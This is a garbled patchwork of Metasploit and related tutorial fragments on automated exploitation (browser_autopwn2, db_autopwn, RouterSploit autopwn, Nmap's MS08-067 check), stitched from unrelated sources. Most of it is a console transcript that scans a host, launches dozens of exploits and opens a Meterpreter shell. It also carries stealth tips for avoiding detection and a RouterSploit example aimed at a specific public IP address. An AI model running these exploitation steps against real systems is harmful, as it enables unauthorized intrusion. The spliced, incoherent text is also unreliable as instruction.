We can see that the browser_autopwn module, residing at auxiliary/server/browser_autopwn2, loaded successfully in Metasploit. To launch the attack, we need to specify LHOST, URIPATH, and SRVPORT. SRVPORT is the port on which our exploit server will listen. It is recommended to use port 80 or 443, since an explicit port number in the URL catches many eyes and looks fishy. URIPATH is the directory path for the various exploits, and should be kept in the root ...
It's like a smarter db_autopwn. Hail Mary finds recommended exploits for your targets, filters them using the OS info of your target, and then sorts the exploits into an optimal order. These exploits are then launched as one big volley at your target.
I open a terminal in Kali Linux and type "ifconfig", and it shows an IP address like 10.0.2.15 instead of 192.168.1.xxx. So after that, when I start another terminal to use an autopwn2 bot, here's what I do.
See the documentation for the smbauth library.
randomseed, smbbasic, smbport, smbsign: see the documentation for the smb library.
vulns.short, vulns.showall: see the documentation for the vulns library.

Example Usage
nmap --script smb-vuln-ms08-067.nse -p445
nmap -sU --script smb-vuln-ms08-067.nse -p U:137

Script Output
smb-vuln-ms08-067:
  VULNERABLE:
  Microsoft Windows system vulnerable to remote code execution (MS08-067)
    State: VULNERABLE
    IDs: CVE:CVE-2008-4250
      The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization.
    Disclosure date: 2008-10-23
    References:
      -us/library/security/ms08-067.aspx_
      -bin/cvename.cgi?name=CVE-2008-4250

Requires: msrpc, smb, string, vulns
Authors: Ron Bowes, Jiayi Ye, Paulino Calderon
License: Same as Nmap--See -legal.html
Metasploit provides functionality to automate exploitation via the autopwn command[1]. When you write a module, there are certain requirements for it to be used within the autopwn routine.
This method is responsible for determining the correct target when the module is used for automated exploitation. In the future, this method will be able to query the database for target-specific information. The autofilter method can set the TARGET datastore value along with any other common parameters. As long as the final return value is true, the module will be executed as part of autopwn.
For the sake of a quick how-to, I'm just going to show you how to use the db_nmap feature, which automatically adds all the port scan details for your host to the database. Then we'll briefly run through matching exploits from the db.
Something else I would like to point out is the difference between db_nmap and using a Nessus scan output. The Nessus output is much more accurate in terms of applied attacks, since these scan files include CVE info; with it the autopwn feature can select only the exploits matching those CVEs, rather than all exploits that match an open port, as it does with an Nmap scan. This is important if you are trying to run an automated attack without being too loud. It is also somewhat sloppy to fire off 50 port 21 exploits when you are sure only one of the exploits in the framework may work.
AutoPWN Suite uses an Nmap TCP SYN scan to enumerate the host and detect the versions of the software running on it. After gathering enough information about the host, AutoPWN Suite automatically generates a list of "keywords" to search the NIST vulnerability database.
The AMES tool parses the new-style .nessus XML file output by the Nessus scanning software; it then locates any exploit based on the CVE reported. The tool then builds a selection of command lines that the user can easily copy and paste. Since Metasploit removed the autopwn feature, this serves as a point-and-click exploitation aid.
       =[ metasploit v3.3-testing [core:3.3 api:1.0]
+ -- --=[ 444 exploits - 216 auxiliary
+ -- --=[ 190 payloads - 21 encoders - 8 nops
       =[ svn r7521 updated today (2009.11.15)

msf >
With Metasploit started, I decided to use the db_autopwn functionality to almost completely automate exploitation of the target. I create a sqlite3 database, tell Metasploit to scan the target with Nmap, then use db_autopwn to exploit the target.
msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /home/richard/.msf3/sqlite3.db
msf > db_connect
[*] Successfully connected to the database
[*] File: /home/richard/.msf3/sqlite3.db
msf > db_nmap 192.168.199.128
Starting Nmap 4.53 ( ) at 2009-11-15 14:37 EST
Interesting ports on 192.168.199.128:
Not shown: 1710 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 00:0C:29:23:94:DD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.642 seconds
msf > db_autopwn
[*] Usage: db_autopwn [options]
    -h           Display this help text
    -t           Show all matching exploit modules
    -x           Select modules based on vulnerability references
    -p           Select modules based on open ports
    -e           Launch exploits against all matched targets
    -r           Use a reverse connect shell
    -b           Use a bind shell on a random port (default)
    -q           Disable exploit module output
    -I  [range]  Only exploit hosts inside this range
    -X  [range]  Always exclude hosts inside this range
    -PI [range]  Only exploit hosts with these ports open
    -PX [range]  Always exclude hosts with these ports open
    -m  [regex]  Only run modules whose name matches the regex
msf > db_autopwn -e -p
[*] (6/90): Launching exploit/netware/smb/lsass_cifs against 192.168.199.128:139...
...edited...
[*] (82/90): Launching exploit/windows/smb/ms04_011_lsass against 192.168.199.128:139...
[*] Started bind handler
[*] (83/90): Launching exploit/windows/smb/ms08_067_netapi against 192.168.199.128:445...
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
[*] Binding to 6bffd098-a112-3610-9833-46c3f87e345a:[email protected]_np:192.168.199.128[\BROWSER] ...
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:[email protected]_np:192.168.199.128[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Started bind handler
[*] (89/90): Launching exploit/windows/smb/ms04_011_lsass against 192.168.199.128:445...
[*] Automatically detecting the target...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.199.128[\lsarpc]...
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
msf >
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.199.1:35634 -> 192.168.199.128:28616)
msf > sessions

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.199.1:35634 -> 192.168.199.128:28616
As Listing 7 shows, Metasploit now automatically runs the mysql-login scan against all listed hosts and also finds the vulnerable root account without a password. For the other cases, dictionaries for a password attack are available under /usr/share/metasploit-framework/data/wordlists. You can apply them by typing:
A rudimentary form of automation is still present in RouterSploit: you can at least check one router for exposure to all exploits at once. For this there is an autopwn module. As a test router, we will take the router at IP 83.17.188.82 on port 80.
Metasploit Armitage is the GUI version of the famous Metasploit framework. We did an entire series of Metasploit tutorials on this site last month. In this part of the BackTrack 5 guide, we will look at the browser autopwn exploit for Windows XP using Metasploit Armitage.
The screenshot above shows that we are logged in and that we add a file at C:\Documents and Settings\winautopwn\Desktop\winautopwn.txt using the shell we gained. It appears instantly on the compromised system in the RDesktop interface.
use a Nessus results import to target a system and autopwn it. Create a new database with db_connect and use db_import to import the scan report. In the next example, we run db_autopwn with a series of switches to launch attacks against all targets (-e), show all matching modules (-t), use a reverse shell payload (-r), select exploit modules based on vulnerability references (-x), and also select based on open ports (-p).